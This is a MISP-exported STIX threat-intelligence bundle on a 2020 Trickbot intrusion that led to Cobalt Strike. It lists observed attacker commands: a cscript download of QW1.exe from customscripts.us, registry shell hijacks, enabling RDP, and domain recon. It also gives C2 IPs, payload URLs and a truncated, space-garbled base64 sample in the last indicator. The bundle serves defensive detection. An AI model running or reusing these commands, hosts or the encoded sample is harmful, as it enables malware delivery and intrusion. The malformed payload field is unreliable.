2023-04-21 13:25:09 +00:00
{
2023-06-14 17:31:25 +00:00
"type" : "bundle" ,
"id" : "bundle--5e6793ed-2868-4474-a485-42210a0a020f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2021-05-24T10:05:31.000Z" ,
"modified" : "2021-05-24T10:05:31.000Z" ,
"name" : "laskowski-tech.com" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5e6793ed-2868-4474-a485-42210a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2021-05-24T10:05:31.000Z" ,
"modified" : "2021-05-24T10:05:31.000Z" ,
"name" : "Trickbot Gtag QW1" ,
"published" : "2020-07-03T03:59:04Z" ,
"object_refs" : [
"x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f" ,
"x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f" ,
"x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f" ,
"x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f" ,
"x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f" ,
"x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f" ,
"x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f" ,
"x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f" ,
"x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f" ,
"x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f" ,
"x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f" ,
"x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f" ,
"x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f" ,
"x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f" ,
"x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f" ,
"x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f" ,
"x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f" ,
"x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f" ,
"indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a" ,
"indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a" ,
"indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f" ,
"indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f" ,
"indicator--5e679e17-e970-4164-bfb5-48b00a0a020f" ,
"indicator--5e679e17-4efc-46ea-9030-4d270a0a020f" ,
"indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f" ,
"observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"indicator--5e67a350-52bc-4280-95d9-4c180a0a020f" ,
"indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f" ,
"indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
" Cobalt Strike Beacon" ,
"trickbot" ,
"Cobalt Strike" ,
"misp-galaxy:malpedia=\"TrickBot\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:16.000Z" ,
"modified" : "2020-03-10T13:29:16.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net config workstation"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe /c ipconfig /all"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net view /all"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe \t/c net view /all /domain"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "cmd.exe /c nltest /domain_trusts /all_trusts"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T13:29:17.000Z" ,
"modified" : "2020-03-10T13:29:17.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:10.000Z" ,
"modified" : "2020-03-10T14:04:10.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '95.179.210.8']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:04:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:25.000Z" ,
"modified" : "2020-03-10T14:04:25.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '50.87.170.67']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:04:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:10.000Z" ,
"modified" : "2020-03-10T14:04:10.000Z" ,
"pattern" : "[url:value = 'https://serviceuphelper.com:80/avxbDFb']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:03:53.000Z" ,
"modified" : "2020-03-10T14:03:53.000Z" ,
"pattern" : "[url:value = 'http://customscripts.us/QW1.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679e17-e970-4164-bfb5-48b00a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:03:53.000Z" ,
"modified" : "2020-03-10T14:03:53.000Z" ,
"pattern" : "[domain-name:value = 'customscripts.us']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"domain\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e679e17-4efc-46ea-9030-4d270a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:04:09.000Z" ,
"modified" : "2020-03-10T14:04:09.000Z" ,
"pattern" : "[domain-name:value = 'serviceuphelper.com']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"domain\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Cobalt Strike"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:37:02.000Z" ,
"modified" : "2020-03-10T14:37:02.000Z" ,
"pattern" : "[url:value = 'http://64.44.133.131/images/cursor.png']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-09T00:00:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\"" ,
"trickbot"
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-17T11:11:14.000Z" ,
"modified" : "2020-03-17T11:11:14.000Z" ,
"first_observed" : "2020-03-17T11:11:14Z" ,
"last_observed" : "2020-03-17T11:11:14Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5e70b052-319c-47bf-a3a8-461c0a0a020f" ,
"value" : "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a350-52bc-4280-95d9-4c180a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:25:20.000Z" ,
"modified" : "2020-03-10T14:25:20.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' b 17e4833 c 580 b b d 343 a 1834 b e 0e2 a 65 f ' A N D f i l e : h a s h e s . S H A 1 = ' 7 a d 2 d 4 c 4 f e 0 e f d 0 21992391 f c d b 7e630 a 19 f 23 f 6 ' A N D f i l e : h a s h e s . S H A 256 = ' 5770 d 351522695562143 f b f 5 d 6381 c b 7 c 13151e3 d 3e1 c d c 923759 b c 60e025 b b e ' A N D f i l e : n a m e = ' J o f e r t . e x e ' A N D f i l e : s i z e = ' 385024 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A C p z a l B + O p F m U G 0 E A A D g B Q A g A B w A Y j E 3 Z T Q 4 M z N j N T g w Y m J k M z Q z Y T E 4 M z R i Z T B l M m E 2 N W Z V V A k A A 1 C j Z 15 Q o 2 d e d X g L A A E E I Q A A A A Q h A A A A f 0 u n s X A 7 k J U p U 0 U G R J Z v R p G W Z 1 o x W b 67 T M k x K R 3 p b j 37 W b w 64 I P P e 5 E v j O 0 q 8 j O P N Q e L 5 x 3 Z S a E f A P h 0 u y 8 Y m N b u R P X k Y M m 2 l B H z l f 94 C G J i f m I 0 y 0 p 9 D w 89 r I 8 a v Q D / O u 0 T g n s X 7 y h p a n 245 k G 7 u M B + N + W e u L q 53 C X K N m F L f H k V 1 Y O / A u f R S t O j P F Q v A J N G e b 4 O s F Z s M F A u u s N P j f b j u G l 13 a w r b 1 m i G T / 0 5 C S F D F u X m P D P t m W F X V A s 5 K E k B B j 1 G P u j A 5 k a M / c h m O G Z b b f i O r h Y B + t s f r e U G D B Q 0 Z n K c 5 a n 8 i V W A i F / e 7 u N s 54 e z L E B 8 h m L c C z J j s e 3 K F e F e r S R p q d L Q 6 w P U f + J 8 C H 3 B 7 b h R 5 D R K 8 D s X E j e u X b B L V r E L i w B O H k 3 U T I f t j M h P l 7 C x q W i I 1 n S z 13 n M e 2 h q C 2 m t J L r w n 7 K y f C U z M h 2 Z l j + U e 9 v Q 9 t Z s c 4 b + v f a 3 t g i S y l m n H K J J E Y o a V 5 H z m w 2 D C d z Y 0 I 3 M t Q A g / Y O W N e T n k H P 371 h I 0 K n 8 f C H D 3 i r D H p 6 O O n i t / Q U C H 6 u O q x C v R i u a b Z r v 1 a 0 / f L 7 x X W P L d i 4 N o u J X / d N E d 4 i A j S H v N X W 7 t 9 i 5 Z G f m a X h u t O 0 N + q M T P N + K A 6 B E U g 5 v 6 / h 6 I Q 1 B l m W O 6 X 5 d 0 S K b x I A 7 U X B Y i c g x q + U f j S 56 h w 1 w I y g L S V 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